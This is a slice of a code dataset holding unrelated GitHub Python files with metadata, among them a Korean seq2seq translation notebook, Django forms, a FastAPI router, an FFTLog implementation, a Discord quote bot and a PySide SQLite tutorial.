DecoderRNN(hidden_size, output_lang.n_words).to(device)\n\n\n\n# In[36]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# 이 코드에서 GRU 셀로 만든 Encoder와 Decoder 이용한다. <br />\n# (이후에는 'Attention'을 추가한 Decoder를 적용해보고자 한다) <br />\n# Iter 횟수는 75000번, 5000번마다 진행상황을 출력하도록 했다.\n\n# <h3>Evaluate</h3>\n\n# In[25]:\n\n\ndef evaluate(encoder, decoder, sentence, max_length=MAX_LENGTH):\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n\n # decoder_attentions = torch.zeros(max_length, max_length)\n\n for di in range(max_length):\n decoder_output, decoder_hidden = decoder(decoder_input, decoder_hidden)\n # decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n if topi.item() == EOS_token:\n decoded_words.append('<EOS>')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_words # decoder_attentions[:di + 1]\n \ndef evaluateRandomly(encoder, decoder, n=10):\n for i in range(n):\n pair = random.choice(pairs)\n print('>', pair[0])\n print('=', pair[1])\n output_words = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n \n\n\n# Decoder는 처음에 input으로 SOS와 이전 hidden state인 encoder_hidden을 받는다. 
<br /> \n# 그리고, 이전에 설명했던 .topk를 이용하여 다음 단어를 예측한다. topi에 저장되어 있는 다음에 올 확률이 가장 높은 단어의 index로 index2word에서 word를 조회하여 계속해서 단어를 문장에 더해준다. <br /> \n# <br />\n# 마지막으로 index로 EOS를 받으면 마지막 문장에 EOS를 append하고 종료한다. <br />\n# 따로 translate라는 함수를 만들어놓았으므로, word2index에 이미 존재하는 word에 한해서, <br />\n# string 형식으로 프랑스어를 입력한다면, 앞서 만든 모델이 번역한 영어 문장을 받아볼 수 있다. <br />\n# (Attention 관련한 부분은 일단 주석처리 하였다)\n\n# In[26]:\n\n\ndef translate(sentence):\n    output_words = evaluate(encoder1, decoder1, sentence)\n    output_sentence = ' '.join(output_words)\n    print(\"input(kor): \" + sentence)\n    print(\"output(eng): \" + output_sentence + \"\\n\")\n\n\n# 그리고, 랜덤한 문장을 번역해 볼 수 있는 translate 함수를 제작했다.\n\n# In[27]:\n\n\n\n# loss 값이 계속해서 감소하는 것을 보아, 한국어-영어 기계번역 모델 학습 자체는 성공했지만, 보다시피 결과가 전혀 매끄럽지 못하다. <br />\n# 이에는 여러가지 요인이 존재할 수 있는데, 앞서 말하자면 한국어-영어 번역은 도전적인 Task 중 하나라고 생각한다. <br />\n# Pytorch 공식 seq2seq에서는 프랑스어-영어 기계번역을 추천한다. <br />\n# 간단한 문장에 한해서는, 손 쉽게 성공적인 번역기를 구현할 수 있기 때문이다. <br />\n# (이는 4_Deep learning_(3)에서 한 번 코딩해보고자 한다) <br />\n# <br />\n# 하지만, 한국어는 영어와 어순도 조사의 사용도 상이하기 때문에, 아무래도 간단한 seq2seq만으로는 성공적인 번역기 제작이 힘들어보인다. <br />\n# 더 성공적인 번역기 제작을 위해서는 seq2seq 이외에도 ELMO 혹은 다른 기술적인 요소가 추가되어야 할 것 같다. <br />\n# 그리고, 기본적으로 형태소 분석을 통해서, 단어를 Tokenization 이후에 번역기를 생성하는 것도 필요해보인다. <br />\n# 일단, 이후에는 'Attention'이라는 개념을 더하여, 4_Deep learning_(2)를 작성해보고자 한다. <br />\n\n# In[ ]:\n\n\n\n\n","repo_name":"jaehong21/AI_Portfolio","sub_path":"정재홍/DeepLearning_python.py","file_name":"DeepLearning_python.py","file_ext":"py","file_size_in_byte":13631,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43477188260","text":"IF_DEVICE_IS_APPLE_INTERNAL_KEYBOARD = [\n    {\n        \"type\": \"device_if\",\n        \"identifiers\": [\n            {\n                \"vendor_id\": 1452,\n                \"product_id\": 636,\n                \"is_keyboard\": True,\n            }\n        ],\n    },\n]\n\nIF_DEVICE_IS_EVOLUENT_VERTICAL_MOUSE_C = [\n    {\n        \"type\": \"device_if\",\n        \"identifiers\": [\n            {\n                \"vendor_id\": 6780,\n                \"product_id\": 405,\n            }\n        ],\n    }\n]\n\nIF_FRONT_APPLICATION_IS_BRAVE_OR_CHROME = [\n    {\n        \"type\": \"frontmost_application_if\",\n        \"bundle_identifiers\": [\n            r\"^com\\.brave\\.Browser$\",\n            r\"^com\\.google\\.Chrome$\",\n        ],\n    }\n]\n\nIF_FRONT_APPLICATION_IS_PYCHARM = [\n    {\n        \"type\": \"frontmost_application_if\",\n        \"bundle_identifiers\": [\n            r\"^com\\.jetbrains\\.pycharm$\",\n            r\"^com\\.jetbrains\\.pycharm-EAP$\",\n        ],\n    }\n]\n","repo_name":"elliotwaite/my-setup","sub_path":"scripts/karabiner/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20910703009","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nimport q\nfrom CorrQ import *\nimport random as rd \nrd.seed(2019)\n\n#Correct solution\nL=[rd.randint(1,100) for i in range(20)]\nans=inverse(L) \nstudent=q.inverse(L) \n\nclass TestInverse(unittest.TestCase):\n\n\tdef test_exist_inverse(self):\n\t\tself.assertTrue(hasattr(q, 'inverse'), \"@1@: \" + _(\"You did not name the method as expected.\"))\n\n\tdef test_inverse(self):\n\t\tfor i in range(len(ans)):\n\t\t\tself.assertEqual(ans[i],student[i],\"@1@: Il y a un problème dans la fonction inverse()\")\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"OpenWeek/inginious-task-LINGE","sub_path":"TP6Ex1/src/TestQ.py","file_name":"TestQ.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"32748924823","text":"from django import forms\r\nfrom django.core.exceptions import ValidationError\r\nfrom .models import UserProfile\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Article, Gallery\r\nfrom tinymce.widgets import TinyMCE\r\nfrom django.forms.models import inlineformset_factory\r\nfrom parler.forms import TranslatableModelForm, TranslatedField\r\nfrom django.utils.translation import gettext_lazy as _\r\n\r\n\r\nclass TinyMCEWidget(TinyMCE):\r\n def use_required_attribute(self, *args):\r\n return False\r\n\r\n\r\nclass UpdateArticleForm(TranslatableModelForm):\r\n title = TranslatedField()\r\n description = TranslatedField()\r\n body = TranslatedField(form_class=forms.CharField, widget=TinyMCEWidget(attrs={'required': False, 'cols': 30, 'rows': 10}))\r\n\r\n class Meta:\r\n model = Article\r\n fields = {\r\n 'title',\r\n 'description',\r\n 'body',\r\n 'tree_category',\r\n 'image'\r\n }\r\n\r\n\r\nclass AddNewArticle(TranslatableModelForm):\r\n class Meta:\r\n model = Article\r\n fields = {\r\n 'title',\r\n 'description',\r\n 'body',\r\n 'tree_category',\r\n 'image'\r\n }\r\n title = TranslatedField()\r\n description = TranslatedField()\r\n body = TranslatedField(form_class=forms.CharField,\r\n widget=TinyMCEWidget(attrs={'required': False, 'cols': 30, 'rows': 10}))\r\n # body = forms.CharField(\r\n # widget=TinyMCEWidget(\r\n # attrs={'required': False, 'cols': 30, 'rows': 10}\r\n # )\r\n # )\r\n image = TranslatedField(form_class=forms.ImageField(required=False))\r\n tree_category = TranslatedField()\r\n\r\n\r\nclass UpdateProfileFormView(forms.ModelForm):\r\n\r\n class Meta:\r\n model = User\r\n fields = {\r\n 'first_name',\r\n 'last_name',\r\n 'email',\r\n }\r\n image = forms.ImageField()\r\n id = forms.IntegerField(widget=forms.HiddenInput())\r\n\r\n def save(self, commit=True):\r\n user = User.objects.get(pk=self.cleaned_data['id'])\r\n user.last_name = self.cleaned_data['last_name']\r\n user.first_name = self.cleaned_data['first_name']\r\n user.email = self.cleaned_data['email']\r\n # user.password = self.cleaned_data['password']\r\n user.save()\r\n user_image = UserProfile.objects.get(pk=user.pk)\r\n user_image.image = self.cleaned_data['image']\r\n return user_image.save()\r\n\r\n\r\nCHOICE_LIST = (\r\n ('-like', _('Popular')),\r\n ('like', _('Unpopular')),\r\n ('-id', _('New')),\r\n ('id', _('Old'))\r\n)\r\n\r\n\r\nclass ArticleGalleryForm(forms.ModelForm):\r\n class Meta:\r\n model = Gallery\r\n fields = {\r\n 'article',\r\n 'image'\r\n }\r\n # image = forms.ImageField()\r\n\r\n\r\nArticleGalleryFormSet = inlineformset_factory(Article, Gallery, form=ArticleGalleryForm, extra=1)\r\n\r\n# class FamilyMemberForm(ModelForm):\r\n# class Meta:\r\n# model = FamilyMember\r\n# exclude = ()\r\n#\r\n# FamilyMemberFormSet = inlineformset_factory(Profile, FamilyMember,\r\n# form=FamilyMemberForm, extra=1)\r\n","repo_name":"RadionovStalker/carblog_heroku2","sub_path":"blog_engine/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12009339618","text":"import math \n\ndef mayor(uno, dos):\n if(uno > dos):\n res = uno\n else:\n res = dos\n return res\n\ndef longitud(liscad):\n i = 0\n for x in liscad:\n i += 1\n return i\n \ndef es_palindromo(pal):\n caduno = []\n caddos = []\n\n x = len(pal)-1\n while x >= math.floor(len(pal)/2):\n caddos += pal[x]\n x -= 1\n \n i = 0\n while i <= math.floor(len(pal)/2):\n caduno 
+= pal[i]\n i += 1\n\n return caduno == caddos\n\ndef duplica(veces,caracter):\n x = 1\n nuevocar = caracter\n while x < veces:\n nuevocar = nuevocar + caracter\n x+=1\n return nuevocar\n\n\nif __name__ == \"__main__\":\n print(mayor(2,3))\n lista = [1,2,3,4,5,6,7,8,9,10]\n cadena = \"reconocer\"\n cadenados = \"prueba\"\n cadenatres = \"sometemos\"\n print(longitud(lista))\n print(longitud(cadena))\n print(es_palindromo(cadena))\n print(es_palindromo(cadenados))\n print(es_palindromo(cadenatres))\n print(duplica(5,\"x\"))\n print(duplica(10,\"y\"))\n \n ","repo_name":"ValeLanda/IS20213-1-Lab","sub_path":"pr1.py","file_name":"pr1.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31296935513","text":"import json\nimport re\nfrom typing import Dict, List\nfrom urllib.parse import urlparse\nimport markdown\nfrom django.template.defaultfilters import register\nfrom django.utils import safestring\nimport html\n\nfrom topics.helpers.allowed_icons import allowed_icons\n\ntag_detector = re.compile(\"#([a-zA-Z]+[A-Za-z0-9]*)\")\ntag_markup = \"\"\"\n<span class=\"tag\"><span class=\"hash\">#</span><span class=\"name\">\\g<1></span></span>\n\"\"\".strip()\n\n\ndef detect_tags(text):\n return tag_detector.findall(text)\n\n\ndef add_tags_to_topic_resources(resources: List[Dict[str, Dict[str, str]]]) -> None:\n for resource in resources:\n if resource.get(\"link\"):\n resource['link']['tags'] = detect_tags(resource['link'].get(\"metadata\", \"\"))\n if any(resource['link']['tags']):\n if resource['link']['tags'][-1] in allowed_icons:\n resource['link']['icon'] = resource['link']['tags'][-1]\n\n\ndef replace_tags(text):\n return tag_detector.sub(tag_markup, text)\n\n\ndef setup():\n @register.filter(name='markdownify')\n def markdownify(value):\n return safestring.mark_safe(markdown.markdown(replace_tags(value)))\n\n @register.filter(name='un_markdownify')\n def un_markdownify(value):\n return safestring.mark_safe(html.unescape(value))\n\n @register.filter(name='un_markdownify_input')\n def un_markdownify(value):\n return safestring.mark_safe(html.unescape(value).replace('\"', \""\"))\n\n @register.filter(name='get_item')\n def get_item(dictionary, key):\n return dictionary.get(key)\n\n\nduplicate_topic_warning = \"\"\"\n<i class=\"ss-alert\"></i>\nThere was an error while renaming or rearranging topics:\na topic with that name already exists in this category.\n\"\"\"\n\n\ndef www_remover(input_text, r=re.compile(\"^www\\.\")):\n return r.sub(\"\", input_text)\n\n\ndef url_handler(url):\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n parsed = urlparse(url)\n output_url = parsed.geturl()\n domain = www_remover(parsed.netloc)\n domain_link = \"{}://{}\".format(parsed.scheme, domain)\n return domain, domain_link, output_url\n\n\ndef normalize_netloc(netloc, domain):\n if netloc:\n if netloc.startswith(\"www.\"):\n return netloc.split(\"www.\")[1]\n else:\n return netloc\n else:\n return domain\n\n\ndef normalize_url(url, domain=\"\"):\n return \"{scheme}://{netloc}{path}{params}{query}{fragment}\".format(\n scheme=url.scheme if url.scheme else \"http\",\n netloc=normalize_netloc(url.netloc, domain),\n path=\"/\" + url.path.lstrip(\"/\") if url.path else \"\",\n params=\";\" + url.params if url.params else \"\",\n query=\"?\" + url.query if url.query else \"\",\n fragment=\"#\" + url.fragment if url.fragment else \"\"\n )\n\n\ndef process(input_string) -> List[Dict[str, Dict[str, 
str]]]:\n if any(input_string.strip()):\n data = json.loads(input_string)\n for item in data:\n for data_type, d in item.items():\n if data_type == \"link\":\n d['url'] = url_handler(d['url'])\n return data\n else:\n return []\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n","repo_name":"andychase/codebook","sub_path":"topics/helpers/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72519514400","text":"# Задача 1. Три друга взяли вещи в поход. Сформируйте словарь, где ключ — имя друга, а значение — кортеж вещей.\n# Ответьте на вопросы:\n# 1) Какие вещи взяли все три друга\n# 2) Какие вещи уникальны, есть только у одного друга и имя этого друга\n# 3) Какие вещи есть у всех друзей кроме одного и имя того, у кого данная вещь отсутствует\n# Для решения используйте операции с множествами.\n# Код должен расширяться на любое большее количество друзей.\n\ndata = {'Алексей': ('палатка', 'котелок', 'мангал', 'топор', 'веревка'),\n 'Константин': ('гитара', 'алкоголь', 'продукты', 'палатка', 'туалетные принадлежности', 'нож'),\n 'Анна': ('туалетные принадлежности', 'столовые приборы', 'скатерть', 'походный стол со стульями', 'кастрюля',\n 'сковорода', 'палатка')}\n\nprint('1. Какие вещи взяли все три друга?')\n# all_frends_values = set.intersection(*map(set, data.values())) # это вариант про вещи, которые есть у всех друзей\nall_items = set()\nfor items in data.values():\n all_items.update(items)\nall_items = list(all_items)\nfor item in all_items:\n print(f'\\t{item}')\n\nprint('-------------------------\\n2. Какие вещи уникальны (есть только у одного друга)? Укажите имя этого друга.')\nlst = []\nfor frend in data:\n lst.extend(list(data[frend]))\nno_item = set()\n\nfor frend, value in data.items():\n for i in range(len(value)):\n if lst.count(value[i]) == 1:\n print(f'\\t{value[i]} - {frend}')\n if lst.count(value[i]) == len(data) - 1:\n no_item.add(value[i])\n\nprint('-------------------------\\n3. Какие вещи есть у всех друзей, кроме одного? 
Укажите имя того, у кого данная вещь отсутствует.')\nfor frend, value in data.items():\n for i in no_item:\n if i not in data[frend]:\n print(f'\\t{i} - {frend}')\n","repo_name":"YuBarSoft/Immersion_in_Python-HW","sub_path":"HW3/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3533633817","text":"from typing import List\n\nfrom fastapi import (\n APIRouter,\n Depends,\n Response,\n status\n)\n\nfrom models.schemas.income import (\n IncomeGet,\n IncomeCreate,\n IncomeUpdate\n)\nfrom services.incomes import Income\n\nrouter = APIRouter(\n prefix='/incomes'\n)\n\n\n@router.get('/', response_model=List[IncomeGet])\nasync def get_incomes(\n service: Income = Depends()\n):\n return service.get_list()\n\n\n@router.post('/', response_model=IncomeGet)\nasync def create_income(\n data: IncomeCreate,\n service: Income = Depends()\n):\n return service.create(\n data\n )\n\n\n@router.get('/{key}', response_model=IncomeGet)\nasync def get_income(\n key: int,\n service: Income = Depends()\n):\n return service.get(\n key\n )\n\n\n@router.put('/{key}', response_model=IncomeGet)\nasync def update_income(\n key: int,\n data: IncomeUpdate,\n service: Income = Depends()\n):\n return service.update(\n key,\n data\n )\n\n\n@router.delete('/{key}', response_model=IncomeGet)\nasync def delete_income(\n key: int,\n service: Income = Depends()\n):\n service.delete(\n key\n )\n\n return Response(\n status_code=status.HTTP_204_NO_CONTENT\n )\n","repo_name":"cybersturmer/findragon-core-api","sub_path":"api/incomes.py","file_name":"incomes.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20134447019","text":"import os\nimport numpy as np\nfrom numpy import pi, cos, sin, log, exp, sqrt, trapz\nfrom numpy.fft import rfft\nfrom scipy.interpolate import interp1d\nfrom scipy.special import gamma\n\ndef MPC(l, pn):\n \"\"\" matrix for spherical bessel transform from power spectrum to correlation function \"\"\"\n return pi**-1.5 * 2.**(-2. * pn) * gamma(1.5 + l / 2. - pn) / gamma(l / 2. + pn)\n\ndef CoefWindow(N, window=1, left=True, right=True):\n \"\"\" FFTLog auxiliary function: window sending the FFT coefficients to 0 at the edges. Adapted from fast-pt \"\"\"\n n = np.arange(-N // 2, N // 2 + 1)\n if window == 1:\n n_cut = N // 2\n else:\n n_cut = int(window * N // 2.)\n\n n_right = n[-1] - n_cut\n n_left = n[0] + n_cut\n\n n_r = n[n[:] > n_right]\n n_l = n[n[:] < n_left]\n\n theta_right = (n[-1] - n_r) / float(n[-1] - n_right - 1)\n theta_left = (n_l - n[0]) / float(n_left - n[0] - 1)\n\n W = np.ones(n.size)\n if right: W[n[:] > n_right] = theta_right - 1 / (2. * pi) * sin(2 * pi * theta_right)\n if left: W[n[:] < n_left] = theta_left - 1 / (2. 
* pi) * sin(2 * pi * theta_left)\n\n return W\n\nclass FFTLog(object):\n \"\"\"\n A class implementing the FFTLog algorithm.\n\n Attributes\n ----------\n Nmax : int, optional\n maximum number of points used to discretize the function\n xmin : float, optional\n minimum of the function to transform\n xmax : float, optional\n maximum of the function to transform\n bias : float, optional\n power by which we modify the function as x**bias * f\n\n Methods\n -------\n setx()\n Calculates the discrete x points for the transform\n\n setPow()\n Calculates the power in front of the function\n\n Coef()\n Calculates the single coefficients\n\n sumCoefxPow(xin, f, x, window=1)\n Sums over the Coef * Pow reconstructing the input function\n \"\"\"\n\n def __init__(self, **kwargs):\n self.Nmax = kwargs['Nmax']\n self.xmin = kwargs['xmin']\n self.xmax = kwargs['xmax']\n self.bias = kwargs['bias']\n self.dx = log(self.xmax / self.xmin) / (self.Nmax - 1.)\n self.setx()\n self.setPow()\n\n def setx(self):\n self.x = np.empty(self.Nmax)\n for i in range(self.Nmax):\n self.x[i] = self.xmin * exp(i * self.dx)\n\n def setPow(self):\n self.Pow = np.empty(self.Nmax + 1, dtype=complex)\n for i in range(self.Nmax + 1):\n self.Pow[i] = self.bias + 1j * 2. * pi / (self.Nmax * self.dx) * (i - self.Nmax / 2.)\n\n def Coef(self, xin, f, extrap='extrap', window=1):\n\n interpfunc = interp1d(xin, f, kind='cubic')\n\n fx = np.empty(self.Nmax)\n tmp = np.empty(int(self.Nmax / 2 + 1), dtype=complex)\n Coef = np.empty(self.Nmax + 1, dtype=complex)\n\n if extrap == 'extrap':\n nslow, Aslow = 0, 0\n if xin[0] > self.x[0]:\n #print ('low extrapolation')\n if f[0] * f[1] != 0.:\n nslow = (log(f[1]) - log(f[0])) / (log(xin[1]) - log(xin[0]))\n Aslow = f[0] / xin[0]**nslow\n nshigh, Ashigh = 0, 0\n if xin[-1] < self.x[-1]:\n #print ('high extrapolation')\n if f[-1] * f[-2] != 0.:\n nshigh = (log(f[-1]) - log(f[-2])) / (log(xin[-1]) - log(xin[-2]))\n Ashigh = f[-1] / xin[-1]**nshigh\n\n for i in range(self.Nmax):\n if xin[0] > self.x[i]:\n fx[i] = Aslow * self.x[i]**nslow * exp(-self.bias * i * self.dx)\n elif xin[-1] < self.x[i]:\n fx[i] = Ashigh * self.x[i]**nshigh * exp(-self.bias * i * self.dx)\n else:\n fx[i] = interpfunc(self.x[i]) * exp(-self.bias * i * self.dx)\n\n elif extrap == 'padding':\n for i in range(self.Nmax):\n if xin[0] > self.x[i]:\n fx[i] = 0.\n elif xin[-1] < self.x[i]:\n fx[i] = 0.\n else:\n fx[i] = interpfunc(self.x[i]) * exp(-self.bias * i * self.dx)\n\n tmp = rfft(fx) # numpy\n # tmp = rfft(fx, planner_effort='FFTW_ESTIMATE')() ### pyfftw\n\n for i in range(self.Nmax + 1):\n if (i < self.Nmax / 2):\n Coef[i] = np.conj(tmp[int(self.Nmax / 2 - i)]) * self.xmin**(-self.Pow[i]) / float(self.Nmax)\n else:\n Coef[i] = tmp[int(i - self.Nmax / 2)] * self.xmin**(-self.Pow[i]) / float(self.Nmax)\n\n if window is not None:\n Coef = Coef * CoefWindow(self.Nmax, window=window)\n else:\n Coef[0] /= 2.\n Coef[self.Nmax] /= 2.\n\n return Coef\n\n def sumCoefxPow(self, xin, f, x, window=1):\n Coef = self.Coef(xin, f, window=window)\n fFFT = np.empty_like(x)\n for i, xi in enumerate(x):\n fFFT[i] = np.real(np.sum(Coef * xi**self.Pow))\n return fFFT\n","repo_name":"pierrexyz/pybird","sub_path":"pybird/fftlog.py","file_name":"fftlog.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"24868712458","text":"'''\nGiven the array candies and the integer extraCandies, where candies[i] represents the number of candies that the ith 
kid has.\n\nFor each kid check if there is a way to distribute extraCandies among the kids such that he or she can have the \ngreatest number of candies among them. Notice that multiple kids can have the greatest number of candies.\ne.g.\nInput: candies = [2,3,5,1,3], extraCandies = 3\nOutput: [true,true,true,false,true] \n'''\nclass Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n \n #Slow runtime, reduce somehow\n highest = max(candies)\n empty = [0] * len(candies)\n \n for i in range(len(candies)):\n if (highest - extraCandies) <= candies[i]:\n empty[i] = True\n else:\n empty[i] = False\n return empty\n","repo_name":"Ajat98/LeetCode-2020-Python","sub_path":"easy/kids_candies.py","file_name":"kids_candies.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26402884016","text":"from discord.ext import commands\nimport json\nimport os\nimport random\n\nclass quote(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description=\"Saves the last message sent in the channel, or another message from its ID\", aliases=[\"q\"])\n async def quote(self, ctx, target_message=''): #add support for pinning from message IDs\n \n quotes_file_path = ('commands\\\\quote\\\\quotes.json' if os.name == 'nt' else 'commands/quote/quotes.json') #changes the path format based on the OS\n \n try:\n if target_message == '': #if no message ID is given\n #gets the last message sent in the channel\n counter = 0\n for message in await ctx.channel.history(limit=2).flatten(): #.history also gets the message used to trigger the command\n if counter > 0:\n quote = message\n counter += 1\n else:\n quote = await ctx.channel.fetch_message(int(target_message))\n except:\n await ctx.send(\"Not a valid message ID\")\n print(\"\\n!!!Could not find message ID, ignore below traceback!!!\\n\\n\")\n \n #opens the json file, parses and stores the contents in a var, modifies it, and dumps it back\n with open(quotes_file_path, 'r+') as quotes_file:\n quotes = json.loads(quotes_file.read())\n quotes['quotes'].append({str(quote.author.id):quote.content})\n with open(quotes_file_path, 'w+') as quotes_file:\n json.dump(quotes, quotes_file)\n\n await ctx.send(\"Quote saved!\")\n\n\n\n @commands.command(description=\"Sends a random saved message. 
Include a user ping to send a random saved message from that person\", aliases=[\"rq\"])\n async def randomquote(self, ctx, *, user=''):\n \n quotes_file_path = ('commands\\\\quote\\\\quotes.json' if os.name == 'nt' else 'commands/quote/quotes.json')\n \n with open(quotes_file_path, 'r+') as quotes_file:\n quotes = json.loads(quotes_file.read())\n \n if user == '': #if no user is given\n output_quote = random.choice(quotes['quotes'])\n else: #if a user is given\n user_quotes = []\n for quote in quotes['quotes']:\n '''\n each quote is a dict with the author id as the key and the text as the value\n 'user' is the user mention as str\n it must be sliced to not display the <@!> around the id itself\n '''\n quote_author = str(list(quote.keys())[0])\n if quote_author == user[3:-1]:\n user_quotes.append(quote)\n output_quote = random.choice(user_quotes)\n\n\n output_quote_author_id = list(output_quote.keys())[0] #note that this is a str\n output_quote_text = list(output_quote.values())[0]\n\n #so it doesn't ping the author every time the quote is displayed\n output_quote_author = self.bot.get_user(int(output_quote_author_id))\n\n await ctx.send(f'*\"{output_quote_text}\"\\n -{output_quote_author.name}*')\n \n\n\n\ndef setup(bot):\n bot.add_cog(quote(bot))","repo_name":"Samdal/RowBot","sub_path":"commands/quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39568282015","text":"\"\"\"\nComplete the buildTree function which takes the inorder and postorder traversal sequences of a tree as input arguments. The function then constructs the corresponding binary tree and returns it.\n\"\"\"\ndef buildTree(inorder,preorder): \n \n if len(preorder) == 0 and len(inorder) == 0:\n return None\n \n else:\n binary_tree = ListBinaryTree(preorder[0])\n \"\"\"EXAMPLE: // INORDER = 0123456789 // PREORDER = 4321098765 \"\"\"\n\n #GET THE ROOT VALUE OF BOTH SEQUENCES\n root_value = preorder[0] #4\n inorder_root_index = inorder.find(root_value) #4 is at index 4 FIND THE ROOT VALUE IN THE INORDER SEQUENCE\n\n #SPLIT THE INORDER SEQUENCE IN HALF TO GET SUBTREES\n inorder_left_subtree = inorder[:inorder_root_index] #[:4] so 0123\n inorder_right_subtree = inorder[inorder_root_index + 1:] #4+1 = 5 AND [5:] so 56789\n\n #SPLIT THE PREORDER SEQUENCE IN HALF TO GET SUBTREES\n preorder_left_subtree = preorder[1:inorder_root_index + 1] #3210\n preorder_right_subtree = preorder[inorder_root_index + 1:] #98765\t \n\n #CREATE TREE IN PREORDER TRAVERSAL // left tree, root value, right tree\n construct_tree = buildTree(inorder_left_subtree, preorder_left_subtree)\n binary_tree.insert_tree_left(construct_tree)\n construct_tree = buildTree(inorder_right_subtree, preorder_right_subtree)\n binary_tree.insert_tree_right(construct_tree)\n\n return binary_tree\n\ntree = buildTree(\"42513\",\"12453\")\nprint(tree) #[1, [2, [4, None, None], [5, None, None]], [3, None, None]]\n\ntree = buildTree(\"CS105\",\"0SC15\")\nprint(tree) #[0, [S, [C, None, None], [1, None, None]], [5, None, None]]\n","repo_name":"trishalapiz/CS105-2018","sub_path":"A2 Part 2/A2P2_buildTree.py","file_name":"A2P2_buildTree.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2471272115","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor as RF\n\n#read the data\ntrain = 
pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\n\n#we'll modify the sample submission file to make our submission\nsubmission = pd.read_csv('../input/sample_submission.csv')\n\n#prep the data for sklearn by separating predictors and response\nX = train.drop('Hazard', axis = 1)\ny = train['Hazard']\n\n#one-hot the categoricals\nnum_X = pd.get_dummies(X)\nnum_Xt = pd.get_dummies(test)\n\n#fit the model and predict\nmodel = RF().fit(num_X,y)\nprediction = model.predict(num_Xt)\n\n#write the submission file\nsubmission['Hazard'] = prediction\nsubmission.to_csv('basic_RF.csv', index = False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/liberty-mutual-group-property-inspection-prediction/jwjohnson314/basic-random-forest-w-sklearn.py","file_name":"basic-random-forest-w-sklearn.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"17061272534","text":"import sys\nfrom helpers import absPath\nfrom PySide6.QtSql import QSqlDatabase, QSqlQuery\n\n\n# Crea la conexión\nconexion = QSqlDatabase.addDatabase(\"QSQLITE\")\nconexion.setDatabaseName(absPath(\"Contactos.db\"))\n\n# Abra la conexión\nif not conexion.open():\n print(\"No se puede conectar a la base de datos\")\n sys.exit(True)\nelse:\n print(\"¿Conexión establecida?\", conexion.isOpen())\n\n# Cree una consulta y ejecútela de inmediato usando .exec ()\nconsulta = QSqlQuery()\nconsulta.exec_(\"DROP TABLE IF EXISTS contactos\")\nconsulta.exec_(\"\"\"\n CREATE TABLE IF NOT EXISTS contactos (\n id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE NOT NULL,\n nombre VARCHAR(40) NOT NULL,\n empleo VARCHAR(50),\n email VARCHAR(40) NOT NULL\n )\"\"\")\n\n# Ejecución de consultas dinámicas: formato de cadena\nnombre, empleo, email = \"Héctor\", \"Instructor\", \"hector@ejemplo.com\"\n\nconsulta.exec_(f\"\"\"\n INSERT INTO contactos (nombre, empleo, email)\n VALUES ('{nombre}', '{empleo}', '{email}')\"\"\")\n\n# Ejecución de consultas dinámicas: parámetros de marcador de posición\ncontactos = [\n (\"Manuel\", \"Desarrollador Web\", 